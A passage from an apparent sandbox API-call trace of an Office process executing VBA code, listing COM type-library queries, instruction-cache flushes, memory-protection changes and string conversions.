refPtrFlags=0x0, pBstrDllName=0x204060, pbstrName=0x0, pwOrdinal=0x204080 | out: pBstrDllName=0x204060*=0x0, pbstrName=0x0, pwOrdinal=0x204080*=0x42f0) returned 0x0 [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x204060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x204060, pwOrdinal=0x500000000) returned 0x0 [0046.977] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203d00, pIndex=0x0 | out: ppTLib=0x203d00*=0x7edf740, pIndex=0x0) returned 0x0 [0046.977] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203d10, pDummy=0x0 | out: ppTLibAttr=0x203d10, pDummy=0x0) returned 0x0 [0046.977] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.977] IUnknown:Release (This=0x7edf740) returned 0xd [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x203d00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203d00, pbstrName=0x0, pwOrdinal=0x203d20 | out: pBstrDllName=0x203d00*=0x0, pbstrName=0x0, pwOrdinal=0x203d20*=0x3f90) returned 0x0 [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203d00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203d00, pwOrdinal=0x500000000) returned 0x0 [0046.977] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x204060, pIndex=0x0 | out: ppTLib=0x204060*=0x7edf740, pIndex=0x0) returned 0x0 [0046.977] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x204070, pDummy=0x0 | out: ppTLibAttr=0x204070, pDummy=0x0) returned 0x0 [0046.977] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.977] IUnknown:Release (This=0x7edf740) returned 0xd [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x204060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x204060, pbstrName=0x0, pwOrdinal=0x204080 | out: pBstrDllName=0x204060*=0x0, pbstrName=0x0, pwOrdinal=0x204080*=0x42f0) returned 0x0 [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x204060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x204060, pwOrdinal=0x500000000) returned 0x0 [0046.977] IMalloc:Realloc (This=0x7feff045380, pv=0x7ba54f0, cb=0x2a4) returned 0x3f98d50 [0046.978] IMalloc:Free (This=0x7feff045380, pv=0x7f187f0) [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0046.978] GetCurrentProcess () returned 0xffffffffffffffff [0046.978] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0046.978] SetErrorMode (uMode=0x8001) returned 0x8001 [0046.978] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0046.978] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0046.979] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c49000001c0) returned 1 [0046.979] SetErrorMode (uMode=0x8001) returned 0x8001 [0046.979] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x278) returned 0x7fee3dfd6f0 [0046.979] GetCurrentProcess () returned 0xffffffffffffffff [0046.979] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813c0f8, dwSize=0x53) returned 1 [0046.979] RtlLookupFunctionEntry (in: ControlPc=0x813c0f8, ImageBase=0x204438, HistoryTable=0x204440 | out: ImageBase=0x204438, HistoryTable=0x204440) returned 0x0 [0046.979] VirtualProtect (in: lpAddress=0x813c0f8, dwSize=0x54, flNewProtect=0x40, lpflOldProtect=0x20453c | out: lpflOldProtect=0x20453c*=0x4) returned 1 [0046.980] RtlAddFunctionTable (FunctionTable=0x813c158, EntryCount=0x1, BaseAddress=0x813c000, TargetGp=0x20453c) returned 1 [0046.980] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0046.980] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.980] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.980] IUnknown:Release (This=0x7f72500) returned 0x2 [0046.980] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.980] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.980] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.980] IUnknown:Release (This=0x8128768) returned 0x4 [0046.980] IUnknown:AddRef (This=0x81287c0) returned 0x3 [0046.980] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.980] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.980] IUnknown:Release (This=0x81287c0) returned 0x2 [0046.980] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0046.980] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.980] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.980] IUnknown:Release (This=0x7f72088) returned 0x3 [0046.980] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0046.980] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.980] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.980] IUnknown:Release (This=0x7f72138) returned 0x3 [0046.980] IUnknown:AddRef (This=0x7f723a0) returned 0x7 [0046.980] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.980] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.980] IUnknown:Release (This=0x7f723a0) returned 0x6 [0046.980] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0046.980] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.980] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.980] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0046.980] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0046.980] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.980] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.980] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0046.980] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0046.981] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205968 | out: ppvObject=0x205968*=0x0) returned 0x80004002 [0046.981] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205960 | out: ppvObject=0x205960*=0x0) returned 0x80004002 [0046.981] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0046.987] GetUserDefaultLCID () returned 0x409 [0046.987] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\x4489\x2024\x7c83\x2024\xf00\xbe8e\xfc40\x83ff\x247c\x320\x8f0f\x7888\x08\x448a\x6124\xe8c0\x2405\xf01\xc0b6\xc085\x850f\xfe8e\x07\x448b\x2424\x8348\x6f8\x870f\xf5af\x13\xc748\x2444\x640") returned 0x0 [0046.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.988] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0046.988] IMalloc:Realloc (This=0x7feff045380, pv=0x7ba54f0, cb=0x13c) returned 0x810c330 [0046.988] IMalloc:Free (This=0x7feff045380, pv=0x7f188b0) [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.988] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0046.988] GetCurrentProcess () returned 0xffffffffffffffff [0046.989] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0046.989] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0046.989] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x7f72500) returned 0x2 [0046.989] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.989] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x8128768) returned 0x4 [0046.989] IUnknown:AddRef (This=0x81287c0) returned 0x3 [0046.989] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x81287c0) returned 0x2 [0046.989] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0046.989] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x7f72088) returned 0x3 [0046.989] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0046.989] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x7f72138) returned 0x3 [0046.989] IUnknown:AddRef (This=0x7f723a0) returned 0x7 [0046.989] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x7f723a0) returned 0x6 [0046.989] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0046.989] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0046.989] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0046.989] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0046.989] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0046.989] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.989] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.989] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0046.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x38\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.990] GetUserDefaultLCID () returned 0x409 [0046.990] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0046.990] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0046.990] IMalloc:Realloc (This=0x7feff045380, pv=0x7ba54f0, cb=0x94) returned 0x8122e90 [0046.990] IMalloc:Free (This=0x7feff045380, pv=0x7f18850) [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0046.990] GetCurrentProcess () returned 0xffffffffffffffff [0046.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0046.990] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0046.990] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, 